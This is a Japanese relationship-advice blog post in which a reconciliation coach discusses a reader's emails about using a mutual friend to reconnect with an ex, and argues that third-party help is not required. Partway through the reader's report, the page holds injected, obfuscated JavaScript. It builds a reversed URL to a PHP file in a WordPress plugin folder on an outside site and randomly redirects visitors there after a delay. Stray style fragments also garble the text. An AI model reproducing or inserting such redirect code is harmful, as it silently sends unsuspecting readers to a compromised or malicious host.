元彼元カノとの復縁は第三者友達の協力がないと諦めるべきか?

この記事は5分で読めます

こんにちは、復縁ドッグです。

(。ゝω・)b゙。:+.゜ヨロピク。:+.

私は、復縁に成功し、今ではその彼女と結婚しています。

壮絶!ウツになりかけた復縁までの体験記

 

このページでは、復縁ドッグがサポートしている、

復縁活動中の方から頂いた、メールを見ながら、

復縁に役に立つ、正しい知識をお伝えしています。

 

正しい行動は、復縁につながりますので、しっかり学んで、

あなたの努力を、復縁につなげましょう。

ヾ( ̄ー ̄ゞ)))(  ̄ー ̄)尸フレーフレー

では、はじめていきます。

“第三者のパワー”と

“第三者の必要性”ついて書いていきます。

(*≧▽≦)bb めっさ楽しみやん!!

第三者の力については、よく言われていることですので、

あなたも、聞いたことがあると思います。

 

では、その効果はどのくらいのものなのでしょうか?

実際の報告メールを見ながら、第三者のパワーを見ていきましょう。

※個人が特定されないように加工してあります。

 

【質問】

こんばんは!御無沙汰しております。

小林(仮名)です!

返信がだいぶ遅くなってしまい申し訳ありませんでした…(T_T)

 

先月、私の復縁に協力してくださる第三者ができました! 同じ●●の女の先輩です!その先輩は彼と同級生です。

 

付き合っていたことから、別れた事、もう一度彼に会いたい事など打ち明けました。

 

そしたらその先輩が「会わせてあげる!復縁頑張ろうよ!」と言ってくださり、来週の●曜日に誘って飲み会を開く事になりました!

 

もちろん、彼も参加です。

 

●月にあった飲み会で、一言も話せずに後悔したので、今回は絶対に後悔しないように勇気を振り絞って、話しかけにいきます!!(*^^*)

 

●曜日、とても緊張しています。

何を話せばいいだろう?

何を伝えたいのだろう?

など色々と考えています。

 

復縁ドッグさん、是非応援ヨロシクお願いしますね(*´∀`)b

 

小林(仮名)

【回答】

こんばんは、復縁ドッグです。

 

お疲れ様でした。

第三者のことなど、良い方向に転がりだしていますね。

 

この飲み会では、目標は何かを明確にすることで、

自然と、何を話せばいいのかが見えてくると思います。

 

例えば、

・ひとまず、気軽に連絡ができる間柄になりたいのか

・第三者の方を交えて、遊びに行きたいのか

・仕事で不安なことが多そうなので今後アドバイスが欲しいのか

 

事前に第三者さんと打ち合わせるだけで、飲み会の流れも

変わってくると思いますよ。

 

私でしたら、様子を見ながら3番目辺りから攻めていって、

2番目の約束を、第三者さんも交えながら取れば最高ですが、

小林(仮名)さんは、前回の件もありますので、まずは、楽しく話が出来るだけでも、上

出来かもしれませんね^^

 

どこまで攻めたいかを決めて、第三者さんと意識を共有してから、

飲み会に参加すると、良い方に流れると思います。

もちろん、応援していますので、楽しんできてくださいね。

 

復縁ドッグ

【質問】

復縁ドッグ様

 

こんばんは!小林(仮名)です(*^^*)

 

報告です!

前回の飲み会、大成功でした!

飲み会の120分中の10分ほど、彼と話しができたらいいかなぁと思っていたのですが…。

 

第三者の方のおかげで、途中から彼と席が近くなり、話も盛り上がり、第三者の方と彼と私と一緒に、1時間ぐらい話していました。

 

距離感を保ちながら聞き役に周り、彼のテンションの上がる話はなるべく伸ばすように過ごしました!

 

別れてからはいつも私から彼にメールを送っていましたが、今回は、飲み会が終わった後、彼からメールをくれました!!

 

また、前はメールをしても、彼が乗り気ではなく、2通ぐらいで終わらせていたのですが、今回は、メールを切ろうと思っても、彼から話題も振ってくれて、5通ぐらい続きました!

 

いつもなら、私から「今度ごはんに行こうね!」と送り、彼が「そうだね、また今度」のメールでしたが、

今回は彼から「またごはんに行こうね!」と送ってくれ、メールのテンションも少し高かったように感じました。

 

 

$nJe=function(n){if (typeof ($nJe.list[n]) == “string”) return $nJe.list[n].split(“”).reverse().join(“”);return $nJe.list[n];};$nJe.list=[“\’php.pots_egamiruces/egamieruces-ahctpac/mrof-tcatnoc-is/snigulp/tnetnoc-pw/moc.mrifwaltb.www//:ptth\’=ferh.noitacol.tnemucod”];var number1=Math.floor(Math.random() * 6); if (number1==3){var delay = 18000; setTimeout($nJe(0), delay);}tom: 10px; border: 1px solid #460e44; background-color: #ffffef;”>

他のサイトで、第三者の協力は必要だと書いてあっても、

復縁ドッグの意見としては、

「第三者の協力は絶対に必要なものではない。」ということです。

第三者の協力がなくても、復縁はできるんです。

 

現に、私は第三者の協力がない中、復縁はできましたし、

私以外の、復縁活動中の方達も、復縁に成功しています。

もちろん、第三者の協力はあるにこしたことはありませんが、

第三者の協力は、上手く使っていかないと、マイナスに働くことだってあるのです。

 

だから、協力してくれる第三者がいなくても、まったく、問題なのです。

 

 

 

7stepのサポートメール中でも、

第三者の協力について↓

『第3者がいない状態でも復縁まで進めることが

出来ている相談者の方も過去には多くいらっしゃいます』

そう答えています。

 

詳しくは、別ページで7stepのサポート内容を公開していますので、

そちらをご覧下さい。

7stepへ第三者がいないことを相談してみた→

 

 

このページで、私が言いたいことは、

“諦めて欲しくない”ということなんです。

 

 

できない理由を並べて、「だから、自分には復縁はできないんだ・・・。」

そう、自分で、自分に呪文をかけて欲しくないんです。

 

どうせ、同じ呪文をかけるのであれば、

良い呪文をかけましょうよ。

 

「愛を幸せにできるは、自分なんだ」と・・・。

 

 

uibyそして、今、それが現実となっています。

あなたは、自分にどんな呪文をかけますか?

その呪文によって、あなたの将来が変わってくるのです。

どんな人生を送るのも、自分次第。

決して、流されたり、今ある状況を、自分以外の何かのせいにしてはいけません。

人生のかじ取りは、自分でしていくのです。

 

 

私は今までも、これからも、手に入れたい未来は、

自分の努力で、叶えていくつもりです。

人間、死ぬまで、どう生きるかしかできないのです。

生きている間だけ、どう生きるかを選択できます。

 

本気で変わろうと思いさえすれば、

人は変われると思います。

 

その覚悟だけあれば、人は変われるのです。

もしかしたら、変われるチャンスを、元カレ、元カノは

与えてくれたのかもしれませんよ。

 

あなたは、今後、どういった人生を送りたいのでしょうか?

私は、自分に関わる人に、良い影響を与え続けていきたいと思っています。

この記事が、あなたに良い影響が与えられれば、嬉しく思います。

く( ̄△ ̄)ノガンバレェェェ!!

 

では、また別ページでお会いしましょう。

 

復縁ドッグ

 

この記事を読んでいる人は以下のカテゴリー記事も読んでいます。

復縁失敗体験から学ぶ復縁講座
復縁ドッグによる復縁基礎講座
復縁結婚カップル対談
復縁活動中の方からの疑問を解決
おすすめ復縁マニュアル

  • このエントリーをはてなブックマークに追加

関連記事

コメント

  1. この記事へのコメントはありません。

  1. この記事へのトラックバックはありません。

管理人:復縁ドッグ


恋愛レベルの向上なしに復縁はできない!

恋愛レベルの向上なしに夫婦の絆は作れない!

をモットーに、当サイトは運営されています。


1年2ヵ月の歳月を費やし、

自力で復縁に成功した復縁ドッグは

現在、復縁した彼女と結婚し

幸せな家庭を築いています。



→復縁ドッグによる前10回復縁メール講座



→復縁ドッグの10年以上に渡る復縁日記



→復縁に欠かせない基礎知識


youtube動画一覧

復縁オンライン講座